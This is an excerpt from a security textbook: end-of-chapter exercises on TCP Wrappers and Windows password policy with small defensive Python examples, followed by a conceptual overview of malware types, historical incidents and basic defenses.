10. On a UNIX system, if a file has the permissions rwxr-xrw-, what permissions does the owner of the file have?
A. Read only
B. Read and write
C. Read, write, and execute
D. None
Essay Quiz
1. Explain the difference between a "hotfix" and a "service pack" and describe why both are so important.
2. A new administrator needs some help creating a security baseline. Create a checklist/template that covers the basic steps in creating a security baseline to assist them, and explain why each step is important.
Lab Projects
• Lab Project 14.1 Use a lab system running Linux with at least one open service such as FTP, Telnet, or SMTP. From another lab system, connect to the Linux system and observe your results. Configure TCP wrappers on the Linux system to reject all connection attempts from the other lab system. Now try to reconnect, and observe your results. Document your steps and explain how TCP wrappers work.
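A model of the decision that TCP Wrappers makes for Lab Project 14.1, added here as an example; it is not the book's code and not the libwrap implementation. It evaluates constructed hosts.allow and hosts.deny contents in the order hosts_access(5) documents: a match in hosts.allow grants the connection, otherwise a match in hosts.deny refuses it, otherwise the connection is granted. Only part of the pattern language is modelled (ALL, exact addresses, trailing-dot prefixes, net/mask pairs and EXCEPT); the daemon names and addresses are made up.

```python
"""Model of TCP Wrappers access control (/etc/hosts.allow, /etc/hosts.deny).

Added example, not from the book and not libwrap. Rules have the form
"daemon_list : client_list [: options]". hosts.allow is consulted first,
then hosts.deny; a client matching neither file is allowed. Patterns
modelled: ALL, exact IPs, trailing-dot prefixes (192.168.1.), net/mask
pairs and the EXCEPT operator. Hostname patterns are not modelled.
"""
import ipaddress

HOSTS_ALLOW = """\
# constructed /etc/hosts.allow
sshd: 192.168.1.10
vsftpd: 192.168.1.0/255.255.255.0 EXCEPT 192.168.1.20
"""

HOSTS_DENY = """\
# constructed /etc/hosts.deny: lab 14.1 style "refuse everything else"
ALL: ALL
"""


def _match_client(pattern, client_ip):
    """Does one client pattern match the connecting IP address?"""
    pattern = pattern.strip()
    if pattern == "ALL":
        return True
    if pattern.endswith("."):                      # 192.168.1. matches 192.168.1.x
        return client_ip.startswith(pattern)
    if "/" in pattern:                             # net/mask, e.g. 192.168.1.0/255.255.255.0
        return ipaddress.ip_address(client_ip) in ipaddress.ip_network(pattern, strict=False)
    return pattern == client_ip


def _match_daemon(pattern, daemon):
    return pattern.strip() in ("ALL", daemon)


def _match_list(list_text, value, matcher):
    """Match a space-separated list that may contain 'a b EXCEPT c d'."""
    included, _, excluded = list_text.partition("EXCEPT")
    hit = any(matcher(p, value) for p in included.split())
    if hit and excluded:
        hit = not any(matcher(p, value) for p in excluded.split())
    return hit


def file_matches(text, daemon, client_ip):
    """True if any rule in the file text matches this daemon and client."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()       # drop comments and blank lines
        if not line:
            continue
        daemons, _, rest = line.partition(":")
        clients = rest.split(":")[0]               # ignore any trailing option field
        if _match_list(daemons, daemon, _match_daemon) and _match_list(clients, client_ip, _match_client):
            return True
    return False


def hosts_access(daemon, client_ip, allow=HOSTS_ALLOW, deny=HOSTS_DENY):
    """Return True if the wrapper would accept the connection."""
    if file_matches(allow, daemon, client_ip):
        return True
    if file_matches(deny, daemon, client_ip):
        return False
    return True                                    # matched neither file: allowed


if __name__ == "__main__":
    for daemon, ip in [("sshd", "192.168.1.10"), ("sshd", "192.168.1.30"),
                       ("vsftpd", "192.168.1.30"), ("vsftpd", "192.168.1.20"),
                       ("in.telnetd", "192.168.1.10")]:
        verdict = "allow" if hosts_access(daemon, ip) else "deny"
        print(f"{daemon:10} from {ip:14} -> {verdict}")
```

Two points the model makes visible: the order of evaluation means an allow rule always beats a deny rule for the same client, so a lab system listed in hosts.allow cannot be blocked by hosts.deny; and with an empty hosts.deny every unmatched client is let in, which is why the usual hardening pattern is "ALL: ALL" in hosts.deny with explicit exceptions in hosts.allow. The wrapper only decides whether to hand the socket to the daemon; it does not protect a service that was started without libwrap support.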
• Lab Project 14.2 Using a system running Windows, experiment with the Password Policy settings under the Local Security Policy (Settings | Control Panel | Administrative Tools | Local Security Policy). Find the setting for Passwords Must Meet Complexity Requirements and make sure it is disabled. Set the password on the account you are using to bob. Now enable the Passwords Must Meet Complexity Requirements setting and attempt to change your password to jane. Were you able to change it to "jane"? Explain why or why not. Set your password to something the system will allow and explain how you selected that password and how it meets the complexity requirements.
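The complexity rule that Lab Project 14.2 toggles, written out as a check. This is an added example, not the book's code and not Microsoft's implementation. Microsoft documents the rule as: at least six characters, not containing the account name or any part of the full name longer than two characters, and characters from at least three of the categories uppercase letters, lowercase letters, digits, and non-alphanumeric symbols. The account name bob, the full name and the sample passwords are constructed.

```python
"""Check a candidate password against the Windows "Password must meet
complexity requirements" rule set. Added example, not from the book.

Rules as Microsoft documents them: at least six characters; does not
contain the account name or any part of the full name longer than two
characters; uses characters from at least three of four categories
(uppercase, lowercase, digits, non-alphanumeric). The separate
"Minimum password length" policy value is passed in by the caller.
"""
import re


def _name_parts(full_name):
    """Tokens of the full name that the password must not contain (3+ chars).

    Windows splits the full name on commas, periods, dashes, underscores,
    spaces, pound signs and tabs."""
    return [t for t in re.split(r"[ ,.\-_#\t]+", full_name) if len(t) >= 3]


def meets_complexity(password, account_name, full_name="", min_length=0):
    """Return (ok, reasons); ok is True only when every rule passes."""
    reasons = []
    lower = password.lower()
    required = max(6, min_length)
    if len(password) < required:
        reasons.append(f"shorter than {required} characters")
    if account_name and account_name.lower() in lower:
        reasons.append("contains the account name")
    for part in _name_parts(full_name):
        if part.lower() in lower:
            reasons.append(f"contains part of the full name ({part})")
    categories = sum([
        bool(re.search(r"[A-Z]", password)),
        bool(re.search(r"[a-z]", password)),
        bool(re.search(r"[0-9]", password)),
        bool(re.search(r"[^A-Za-z0-9]", password)),
    ])
    if categories < 3:
        reasons.append(f"only {categories} of 4 character categories used")
    return (not reasons), reasons


if __name__ == "__main__":
    for pw in ["bob", "jane", "Jane2016!", "Correct-Horse-7", "bobsmith#2016A"]:
        ok, why = meets_complexity(pw, account_name="bob", full_name="Bob Smith", min_length=8)
        print(f"{pw:18} {'accepted' if ok else 'rejected: ' + '; '.join(why)}")
```

With the constructed account, "jane" is refused for length and for using a single character category, and "bobsmith#2016A" is refused even though it is long and mixed because it contains the account name and a part of the full name. Windows actually counts a fifth category (Unicode letters that are neither upper- nor lowercase) that this check ignores, and complexity says nothing about password age or history, which are separate policy settings.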
Chapter 15
Types of Attacks and Malicious Software
If you know the enemy and know yourself you need not fear the results of a hundred battles.
—SUN TZU
In this chapter, you will learn how to
Describe the various types of computer and network attacks, including denial-of-service, spoofing, hijacking, and password guessing
Identify the different types of malicious software that exist, including viruses, worms, Trojan horses, logic bombs, time bombs, and rootkits
Explain how social engineering can be used as a means to gain access to computers and networks
Describe the importance of auditing and what should be audited
Attacks can be made against virtually any layer or level of software, from network protocols to applications. When an attacker finds a vulnerability in a system, he exploits the weakness to attack the system. The effect of an attack depends on the attacker's intent and can result in a wide range of effects, from minor to severe. An attack on one system might not be visible on the user's system because the attack is actually occurring on a different system, and the data the attacker will manipulate on the second system is obtained by attacking the first system.
Avenues of Attack
A computer system is attacked for one of two general reasons: it is specifically targeted by an attacker, or it is a target of opportunity. In the first case, the attacker has chosen the target not because of the hardware or software the organization is running but for another reason, such as a political reason. For example, an individual in one country might attack a government system in another country to gather secret information. Or the attacker might target an organization as part of a "hacktivist" attack: the attacker could deface the website of a company that sells fur coats because the attacker believes using animals in this way is unethical, for example. Perpetrating some sort of electronic fraud is another reason a specific system might be targeted for attack. Whatever the reason, the attacker usually begins an attack of this nature before he knows which hardware and software the organization uses.

The second type of attack, an attack against a target of opportunity, is launched against a site that has hardware or software that is vulnerable to a specific exploit. The attacker, in this case, is not targeting the organization; he has instead learned of a specific vulnerability and is simply looking for an organization with this vulnerability that he can exploit. This is not to say that an attacker might not be targeting a given sector and looking for a target of opportunity in that sector. For example, an attacker who wants to obtain credit card or other personal information may search for any exploitable company that stores credit card information on its system to accomplish the attack.

Targeted attacks are more difficult and take more time and effort than attacks on a target of opportunity. The latter type of attack simply relies on the fact that, with any piece of widely distributed software, somebody in the organization will not have patched the system as they should have.
Tech Tip
Defense Begins with Eliminating Vulnerabilities
Defense against attacks begins with elimination of vulnerabilities. Vulnerabilities are exploited by attackers to gain access to a system. Minimization of vulnerabilities is one of the foundational elements of defense.
Cross Check
Anatomy of an Attack
Hackers use a process when attacking, and this is covered in detail in Chapter 22.
Minimizing Possible Avenues of Attack
By understanding the steps an attacker can take, you can limit the exposure of your system and minimize the possible avenues an attacker can exploit. Your first step to minimize possible attacks is to ensure that all patches for the operating system and applications are installed. Many security problems, such as viruses and worms, exploit known vulnerabilities for which patches actually exist. These attacks are successful only because administrators have not taken the appropriate actions to protect their systems.

The next step is to limit the services that are running on the system. As mentioned in earlier chapters, limiting the number of services to those that are absolutely necessary provides two safeguards: it limits the possible avenues of attack (the possible services for which a vulnerability may exist and be exploited), and it reduces the number of services the administrator has to worry about patching in the first place.
Cross Check
Baseline Analysis and Patching of Systems
Keeping a system patched and up to date for the operating system and applications is the best defense against exposed vulnerabilities. How up to date is the system you are currently using? How do you know? Chapter 14 covers the baselining and patching of systems to understand and remove vulnerabilities. Refer to that chapter for more in-depth information on how to perform these activities.
Another step is to limit public disclosure of private information about your organization and its computing resources. Since the attacker is after this information, don't make it easy to obtain.
Malicious Code
Malicious code, or malware, refers to software that has been designed for some nefarious purpose. Such software can be designed to cause damage to a system, such as by deleting all files, or it can be designed to create a backdoor in the system to grant access to unauthorized individuals. Most malware instances attack vulnerabilities in programs or operating systems. This is why patching of vulnerabilities is so important, for it closes the point of entry for most malware. Generally the installation of malicious code is done in such a way that it is not obvious to the authorized users. Several different types of malicious software can be used, such as viruses, Trojan horses, logic bombs, spyware, and worms, and they differ in the ways they are installed and their purposes.

Malware can be fairly complex in its construction, with specific features designed to assist malware in avoiding detection. Modern malware can be multipart in construction, where several pieces work together to achieve a desired effect. When malware infects in more than one way, attacking several different kinds of object (for example, both boot sectors and program files), it is called multipartite. Many types of malware can include a changing encryption layer to resist pattern-matching detection. These are called polymorphic. If the malware actually changes its code at the time of infection, this property is called metamorphic.
Viruses
The best-known type of malicious code is the virus. Much has been written about viruses as a result of several high-profile security events that involved them. A virus is a piece of malicious code that replicates by attaching itself to another piece of executable code. When the other executable code is run, the virus also executes and has the opportunity to infect other files and perform any other nefarious actions it was designed to do. The specific way that a virus infects other files, and the type of files it infects, depends on the type of virus. The first viruses created were of two types—boot sector viruses and program viruses.
Boot Sector Virus
A boot sector virus infects the boot sector portion of either a floppy disk or a hard drive (years ago, not all computers had hard drives, and many booted from a floppy). When a computer is first turned on, a small portion of the operating system is initially loaded from hardware. This small operating system then attempts to load the rest of the operating system from a specific location (sector) on either the floppy or the hard drive. A boot sector virus infects this portion of the drive. An example of this type of virus was the Stoned virus, which moved the true Master Boot Record (MBR) from the first to the seventh sector of the first cylinder and replaced the original MBR with the virus code. When the system was turned on, the virus was first executed, which had a one-in-seven chance of displaying a message stating the computer was “stoned”; otherwise, it would not announce itself and would instead attempt to infect other boot sectors. This virus was rather tame in comparison to other viruses of its time, which were often designed to delete the entire hard drive after a period of time in which they would attempt to spread.
Program Virus
A second type of virus is the program virus, which attaches itself to executable files—typically files ending in .exe or .com on Windows-based systems. The virus is attached in such a way that it is executed before the program executes. Most program viruses also hide a nefarious purpose, such as deleting the hard drive data, which is triggered by a specific event, such as a date or after a certain number of other files are infected. Like other types of viruses, program viruses are often not detected until after they execute their malicious payload. One method that has been used to detect this sort of virus before it has an opportunity to damage a system is to calculate checksums for commonly used programs or utilities. Should the checksum for an executable ever change, it is quite likely that it is due to a virus infection.
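The checksum method just described, as an added example that is not from the book: it records a SHA-256 digest for each executable under a directory, stores that baseline, and on re-verification reports files whose digest changed, files that vanished, and files that appeared. The directory layout, file names and file contents in the demo are constructed for illustration.

```python
"""Checksum baseline for executables (added example, not from the book).

Records a SHA-256 digest for every .exe/.com file under a directory, stores
the baseline, and later reports files whose digest changed, files that
vanished, and files that appeared.  A digest change on a program nobody
deliberately updated is the signal the chapter describes.  The directory
layout and file contents below are constructed for the demonstration.
"""
import hashlib
import json
import tempfile
from pathlib import Path

EXECUTABLE_SUFFIXES = (".exe", ".com")


def sha256_of(path: Path) -> str:
    """Hex SHA-256 of a file, read in chunks so large binaries are fine."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map each executable under root (POSIX-style relative path) to its digest."""
    return {
        p.relative_to(root).as_posix(): sha256_of(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in EXECUTABLE_SUFFIXES
    }


def diff_baselines(old: dict, new: dict) -> dict:
    """Classify every path in either snapshot as modified, missing or new."""
    return {
        "modified": sorted(k for k in old if k in new and new[k] != old[k]),
        "missing": sorted(k for k in old if k not in new),
        "new": sorted(k for k in new if k not in old),
    }


def save_baseline(baseline: dict, store: Path) -> None:
    store.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(store: Path) -> dict:
    return json.loads(store.read_text())


def demo() -> dict:
    """Constructed scenario: baseline two executables, then change one,
    remove one and add one, and re-verify against the stored baseline."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        editor = root / "bin" / "editor.exe"
        editor.write_bytes(b"MZ" + b"\x00" * 64)          # constructed bytes
        (root / "bin" / "format.com").write_bytes(b"\xe9\x10\x00" + b"\x90" * 16)
        (root / "notes.txt").write_text("not an executable, so not tracked")

        store = root / "baseline.json"                     # .json: not tracked
        save_baseline(build_baseline(root), store)

        # Later: editor.exe's contents change (as they would after an
        # infection), format.com is gone, and an unknown executable appears.
        editor.write_bytes(b"\xeb\x20" + editor.read_bytes())
        (root / "bin" / "format.com").unlink()
        (root / "bin" / "dropped.exe").write_bytes(b"MZ" + b"\xcc" * 8)

        return diff_baselines(load_baseline(store), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice the baseline file belongs somewhere the scanned host cannot write, since malware that can edit the baseline alongside the executables defeats the comparison.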
Tech Tip
Modern Virus and Worm Threats
Early virus and worm attacks would cause damage to PCs, but they were generally visible to users. Many modern viruses and worms are used to deliver payloads that lead to machines becoming zombies in a botnet, controlled by an attacker. This type of attack is typically invisible to the end user, so as not to alert them to the malware.
Macro Virus
In the late 1990s, another type of virus appeared that now accounts for the majority of viruses. As systems and operating systems became more powerful, the boot sector virus, which once accounted for most reported infections, became less common. Systems no longer commonly booted from floppies, which were the main method for boot sector viruses to spread. Instead, the proliferation of software that included macro-programming languages resulted in a new breed of virus—the macro virus. The Concept virus was the first known example of this new breed. It appeared to be created to demonstrate the possibility of attaching a virus to a document file, something that had been thought to be impossible before the introduction of software that included powerful macro language capabilities. By this time, however, Microsoft Word documents could include segments of code written in a derivative of Visual Basic. Further development of other applications that allowed macro capability, and enhanced versions of the original macro language, had the side effect of allowing the proliferation of viruses that took advantage of this capability. This type of virus is so common today that it is considered a security best practice to advise users never to open a document attached to an e-mail if it seems at all suspicious. Many organizations now routinely have their mail servers eliminate any attachments containing Visual Basic macros.
Avoiding Virus Infection
Always being cautious about executing programs or opening documents sent to you is a good security practice. “If you don’t know where it came from or where it has been, don’t open or run it” should be the basic mantra for all computer users. Another security best practice for protecting against virus infection is to install and run an antivirus program. Since these programs are designed to protect against known viruses, it is also important to maintain an up-to-date listing of virus signatures for your antivirus software. Antivirus software vendors provide this information, and administrators should stay on top of the latest updates to the list of known viruses. Two advances in virus writing have made it more difficult for antivirus software to detect viruses. These advances are the introduction of stealth virus techniques and polymorphic viruses. A stealthy virus employs techniques to help evade being detected by antivirus software that uses checksums or other techniques. Polymorphic viruses also attempt to evade detection, but they do so by changing the virus itself (the virus “evolves”). Because the virus changes, signatures for that virus may no longer be valid, and the virus may escape detection by antivirus software.
Armored Virus
When a new form of malware/virus is discovered, antivirus companies and security researchers will decompile the program in an attempt to reverse-engineer its functionality. Much can be determined from reverse engineering, such as where the malware came from, how it works, how it communicates, how it spreads, and so forth. Armoring malware can make the process of determining this information much more difficult, if not impossible. Some malware, such as Zeus, comes encrypted in ways to prevent criminals from stealing the intellectual property of the very malware that they use.
Modern viruses have a whole host of defenses from detection and analysis. Polymorphic viruses change their appearance, making signature matches difficult. Armored viruses resist being reverse-engineered to determine how they operate. Viruses are designed to be quiet, avoid detection, avoid analysis, and still work—they are significant threats.
Virus Hoaxes
Viruses have caused so much damage to systems that many Internet users become extremely cautious any time they hear a rumor of a new virus. Many users will not connect to the Internet when they hear about a virus outbreak, just to be sure their machines don’t get infected. This has given rise to virus hoaxes, in which word is spread about a new virus and the extreme danger it poses. It may warn users to not read certain files or connect to the Internet. Hoaxes can actually be even more destructive than just wasting time and bandwidth. Some hoaxes warning of a dangerous virus have included instructions to delete certain files if they’re found on the user’s system. Unfortunately for those who follow the advice, the files may actually be part of the operating system, and deleting them could keep the system from booting properly. This suggests another good piece of security advice: make sure of the authenticity and accuracy of any virus report before following somebody’s advice. Antivirus software vendors are a good source of factual data for this sort of threat as well.
Worms
It was once easy to distinguish between a worm and a virus. Recently, with the introduction of new breeds of sophisticated malicious code, the distinction has blurred. Worms are pieces of code that attempt to penetrate networks and computer systems. Once a penetration occurs, the worm will create a new copy of itself on the penetrated system. Reproduction of a worm thus does not rely on the attachment of the virus to another piece of code or to a file, which is the definition of a virus. Viruses were generally thought of as a system-based problem, and worms were network-based. If the malicious code is sent throughout a network, it may subsequently be called a worm. The important distinction, however, is whether the code has to attach itself to something else (a virus) or if it can “survive” on its own (a worm). Some examples of worms that have had high profiles include the Sobig worm of 2003, the SQL Slammer worm of 2003, the 2001 attacks of Code Red and Nimda, and the 2005 Zotob worm, which took down CNN Live. Nimda was particularly impressive in that it used five different methods to spread: via e-mail, via open network shares, from browsing infected web sites, using the directory-traversal vulnerability of Microsoft IIS 4.0/5.0, and, most impressively, through the use of backdoors left by Code Red II and sadmind worms. The Conficker worm, discovered in 2008, spawned such a response that it earned its own working group. Many modern malware items, such as Gameover Zeus, were spread as viruses.
Tech Tip
Social Media Worms
In 2005, a clever MySpace user looking to expand his friends list created the first self-propagating cross-site scripting (XSS) worm. In less than a day, the worm, now known as the Samy worm (or MySpace worm), had gone viral and user Samy had amassed more than 1 million friends on the popular online community. MySpace was taken down because the worm replicated too efficiently, eventually surpassing several thousand replications per second. In 2008, Koobface appeared, and it spread via Facebook, Skype, and other social media platforms. Koobface gives an attacker access to your personal information, such as your banking information, passwords, or other personal details. It then makes the computer part of a botnet.
Protection Against Worms
How you protect your system against worms depends on the type of worm. Those attached and propagated through e-mail can be avoided by following the same guidelines about not opening files and not running attachments unless you are absolutely sure of their origin and integrity. Protecting against worms involves securing systems and networks against penetration in the same way you would protect your systems against human attackers: install patches, eliminate unused and unnecessary services, enforce good password security, and use firewalls and intrusion detection systems. More sophisticated attacks, such as the Samy worm, are almost impossible to avoid.
Polymorphic Malware
The detection of malware by antimalware programs is primarily done through the use of a signature. Files are scanned for sections of code in the executable that act as markers, unique patterns of code that enable detection. Just as the human body creates antigens that match marker proteins, antimalware programs detect malware through unique markers present in the code of the malware. Malware writers are aware of this functionality and have adapted methods to defeat it. One of the primary means of avoiding detection by sensors is the use of polymorphic code, which is code that changes on a regular basis. These changes or mutations are designed not to affect the functionality of the code, but rather to mask any signature from detection. Polymorphic programs can change their coding after each use, making each replicant different from a detection point of view.
Trojan Horses
A Trojan horse, or simply Trojan, is a piece of software that appears to do one thing (and may, in fact, actually do that thing) but hides some other functionality. The analogy to the famous story of antiquity is very accurate. In the original case, the object appeared to be a large wooden horse, and in fact it was. At the same time, it hid something much more sinister and dangerous to the occupants of the city of Troy. As long as the horse was left outside the city walls, it could cause no damage to the inhabitants. It had to be taken in by the inhabitants, and it was inside that the hidden purpose was activated. A computer Trojan works in much the same way. Unlike a virus, which reproduces by attaching itself to other files or programs, a Trojan is a standalone program that must be copied and installed by the user—it must be “brought inside” the system by an authorized user. The challenge for the attacker is enticing the user to copy and run the program. This generally means that the program must be disguised as something that the user would want to run—a special utility or game, for example. Once it has been copied and is inside the system, the Trojan will perform its hidden purpose, with the user often still unaware of its true nature. The single best method to prevent the introduction of a Trojan to your system is never to run software if you are unsure of its origin, security, and integrity. A virus-checking program may also be useful in detecting and preventing the installation of known Trojans.
Tech Tip
Famous Trojans
There have been many “famous” Trojans that have caused significant havoc in systems. Back Orifice (BO), created in 1999, was offered in several versions. BO can be attached to a number of types of programs. Koobface is a Trojan that affects Facebook users. Zeus is a financial Trojan/malware that has a wide range of functionality.
Rootkits
A rootkit is a form of malware that is specifically designed to modify the operation of the operating system in some fashion to facilitate nonstandard functionality. The history of rootkits goes back to the beginning of the UNIX operating system, where they were sets of modified administrative tools. Originally designed to allow a program to take greater control over operating system function when it fails or becomes unresponsive, the technique has evolved and is used in a variety of ways.
In one high-profile case, Sony BMG Corporation used rootkit technology to provide copy protection technology on some of the company’s CDs. Two major issues led to this being a complete debacle for Sony: first, the software modified systems without the user’s approval; and second, the software opened a security hole on Windows-based systems, creating an exploitable vulnerability at the rootkit level. This led the Sony case to be labeled as malware, which is the most common use of rootkits.
A rootkit can do many things—in fact, it can do virtually anything that the operating system does. Rootkits modify the operating system kernel and supporting functions, changing the nature of the system’s operation. Rootkits are designed to avoid, either by subversion or evasion, the security functions of the operating system to avoid detection. Rootkits act as a form of malware that can change thread priorities to boost an application’s performance, perform keylogging, act as a sniffer, hide other files from other applications, or create backdoors in the authentication system. The use of rootkit functionality to hide other processes and files enables an attacker to use a portion of a computer without the user or other applications knowing what is happening. This hides exploit code from antivirus and antispyware programs, acting as a cloak of invisibility.
Exam Tip: Five types of rootkits exist:
Firmware: Attacks firmware on a system
Virtual: Attacks at the virtual machine level
Kernel: Attacks the kernel of the OS
Library: Attacks libraries used on a system
Application level: Attacks specific applications
Rootkits can load before the operating system loads, acting as a virtualization layer, as in SubVirt and Blue Pill. Rootkits can exist in firmware, and these have been demonstrated in both video cards and PCI expansion cards. Rootkits can exist as loadable library modules, effectively changing portions of the operating system outside the kernel. Further information on specific rootkits in the wild can be found at www.antirootkit.com. Once a rootkit is detected, it needs to be removed and cleaned up.
Because of rootkits’ invasive nature, and the fact that many aspects of rootkits are not easily detectable, most system administrators don’t even attempt to clean up or remove a rootkit. It is far easier to use a previously captured clean system image and reimage the machine than to attempt to determine the depth and breadth of the damage and fix individual files.
Logic Bombs
Logic bombs, unlike viruses and Trojans, are a type of malicious software that is deliberately installed, generally by an authorized user. A logic bomb is a piece of code that sits dormant for a period of time until some event invokes its malicious payload. An example of a logic bomb might be a program that is set to load and run automatically, and that periodically checks an organization’s payroll or personnel database for a specific employee. If the employee is not found, the malicious payload executes, deleting vital corporate files.
If the event invoking the logic bomb is a specific date or time, the program will often be referred to as a time bomb. In one famous example of a time bomb, a disgruntled employee left a time bomb in place just prior to being fired from his job. Two weeks later, thousands of client records were deleted. Police were eventually able to track the malicious code to the disgruntled ex-employee, who was prosecuted for his actions. He had hoped that the two weeks that had passed since his dismissal would have caused investigators to assume he could not have been the individual who had caused the deletion of the records.
Logic bombs are difficult to detect because they are often installed by authorized users and, in particular, by administrators who are also often responsible for security. This demonstrates the need for a separation of duties and a periodic review of all programs and services that are running on a system. It also illustrates the need to maintain an active backup program so that if your organization loses critical files to this sort of malicious code, it loses only transactions that occurred since the most recent backup and no permanent loss of data results.
Spyware
Spyware is software that “spies” on users, recording and reporting on their activities. Typically installed without user knowledge, spyware can do a wide range of activities. It can record keystrokes (commonly called keylogging) when the user logs into specific web sites. It can monitor how a user uses a specific piece of software (for example, monitor attempts to cheat at games).
Keylogging is one of the holy grails for attackers, for if they can get a keylogger on a machine, the capturing of user-typed credentials is a quick win for the attacker.
Many uses of spyware seem innocuous at first, but the unauthorized monitoring of a system can be abused very easily. In other cases, the spyware is specifically designed to steal information. Many states have passed legislation banning the unapproved installation of software, but many cases of spyware circumvent this issue through complex and confusing end-user license agreements.
Adware
The business of software distribution requires a form of revenue stream to support the cost of development and distribution. One form of revenue stream is advertising. Software that is supported by advertising is called adware. Adware comes in many different forms. With legitimate adware, the user is aware of the advertising and agrees to the arrangement in return for free use of the software. This type of adware often offers an alternative, ad-free version for a fee. Adware can also refer to a form of malware, which is characterized by software that presents unwanted ads. These ads are sometimes an irritant, and at other times represent an actual security threat. Frequently these ads are in the form of pop-up browser windows, and in some cases they cascade upon any user action.
Botnets
Malware can have a wide range of consequences on a machine, from relatively benign to extremely serious. One form of malware that is seemingly benign to a user is a botnet zombie. Hackers create armies of machines by installing malware agents on the machines, which then are called zombies. These collections of machines are called botnets. These zombie machines are used to conduct other attacks and to spread spam and other malware. Botnets have grown into networks of over a million nodes and are responsible for tens of millions of spam messages daily.
Tech Tip
Famous Botnets
The following are some famous botnets and their current status:
Some time before 2007, the FBI began an anti-botnet operation dubbed Bot Roast. The operation dismantled several botnets and led to several convictions of botnet operators. Other successful anti-botnet operations include the McColo takedown, which decimated Rustock, and coordinated efforts by industry, academia, and law enforcement that have led to the dismantling of BredoLabs, Mariposa, and significant inroads against Conficker and Zeus.
Backdoors and Trapdoors
Backdoors were originally (and sometimes still are) nothing more than methods used by software developers to ensure that they could gain access to an application even if something were to happen in the future to prevent normal access methods. An example would be a hard-coded password that could be used to gain access to the program in the event that administrators forgot their own system password. The obvious problem with this sort of backdoor (also sometimes referred to as a trapdoor) is that, since it is hard-coded, it cannot be removed. Should an attacker learn of the backdoor, all systems running that software would be vulnerable to attack. The term backdoor is also, and more commonly, used to refer to programs that attackers install after gaining unauthorized access to a system to ensure that they can continue to have unrestricted access to the system, even if their initial access method is discovered and blocked. Backdoors can also be installed by authorized individuals inadvertently, should they run software that contains a Trojan horse (introduced earlier). A variation on the backdoor is the rootkit, discussed in the previous section, which is established not to gain root access but rather to ensure continued root access.
Common backdoors include Zeus, NetBus, and Back Orifice. Any of these, if running on your system, can allow an attacker remote access to your system—access that allows them to perform any function on your system.
Ransomware
Ransomware is a form of malware that performs some action and extracts ransom from a user. The most common form of ransomware is one that encrypts a key file or set of files, rendering a system unusable, or data set unavailable. The attacker releases the information after being paid, typically in a nontraceable means such as bitcoin.
A current ransomware threat, appearing in 2013, is CryptoLocker. CryptoLocker is a Trojan horse that will encrypt certain files using RSA public key encryption. When the user attempts to get the files, they are provided with a message instructing them how to purchase the decryption key. Because CryptoLocker uses 2048-bit RSA encryption, brute-force decryption is out of the realm of recovery options. The system is highly automated and users have a short time window to get the private key. Failure to get the key will result in the loss of the data.
Malware Defenses
Malware in all forms—virus, worm, spyware, botnet, and so on—can be defended against in a couple of simple steps:
Use an antivirus program: Most major-vendor antivirus suites are designed to catch most widespread forms of malware. In some markets, the antivirus software is being referred to as anti-x software, indicating that it covers more than viruses. But because the threat environment changes literally daily, the signature files for the software need regular updates, which most antivirus programs offer to perform automatically.
Keep your software up to date: Many forms of malware achieve their objectives through exploitation of vulnerabilities in software, both in the operating system and applications. Although operating system vulnerabilities were the main source of problems, today application-level vulnerabilities pose the greatest risk. Unfortunately, while operating system vendors are becoming more and more responsive to patching, most application vendors are not, and some, like Adobe, have very large footprints across most machines.
One of the challenges in keeping a system up to date is keeping track of the software that is on the system, and keeping track of all vendor updates. There are software products, such as Secunia’s Personal Software Inspector (PSI) program, that can scan your machine to enumerate all the software installed and verify the vendor status of each product. For standalone machines, such as the one in your home, this type of program is a great time-saving item. In even small enterprises, these tools are essential to manage the complexity of patches needed across the machines.
Tech Tip
Malware Defenses
There are two primary defense mechanisms against malware: backups and updates. Malware acts against vulnerabilities, which are patched via keeping software up to date. One of the primary sources of loss is from inability to recover, something covered by backups.
Application-Level Attacks
Attacks against a system can occur at the network level, at the operating system level, at the application level, or at the user level (social engineering). Early attack patterns were against the network, but most of today’s attacks are aimed at the applications. This is primarily because this is where the objective of most attacks resides; in the infamous words of bank robber Willie Sutton, “because that’s where the money is.” In fact, many of today’s attacks on systems are combinations of using vulnerabilities in networks, operating systems, and applications, all means to an end to obtain the desired objective of an attack, which is usually some form of data. Application-level attacks take advantage of several facts associated with computer applications. First, most applications are large programs written by groups of programmers and, by their nature, have errors in design and coding that create vulnerabilities. For a list of typical vulnerabilities, see the Common Vulnerabilities and Exposures (CVE) list maintained by Mitre, http://cve.mitre.org. Second, even when vulnerabilities are discovered and patched by software vendors, end users are slow to apply patches, as evidenced by the SQL Slammer incident in January 2003. The vulnerability exploited was a buffer overflow, and the vendor supplied a patch six months prior to the outbreak, yet the worm still spread quickly due to the multitude of unpatched systems.
Cross Check
Application Vulnerabilities
Applications are a common target of attacks, as attackers have shifted to easier targets as the network and OS have become more hardened. What applications are not up to date on the PC you use every day? How would you know? How would you update them? A more complete examination of common application vulnerabilities is presented in Chapter 18.
Attacking Computer Systems and Networks
From a high-level standpoint, attacks on computer systems and networks can be grouped into two broad categories: attacks on specific software (such as an application or the operating system) and attacks on a specific protocol or service. Attacks on a specific application or operating system are generally possible because of an oversight in the code (and possibly in the testing of that code) or because of a flaw, or bug, in the code (again indicating a lack of thorough testing). Attacks on specific protocols or services are attempts either to take advantage of a specific feature of the protocol or service or to use the protocol or service in a manner for which it was not intended. This section discusses various forms of attacks of which security professionals need to be aware.
Denial-of-Service Attacks
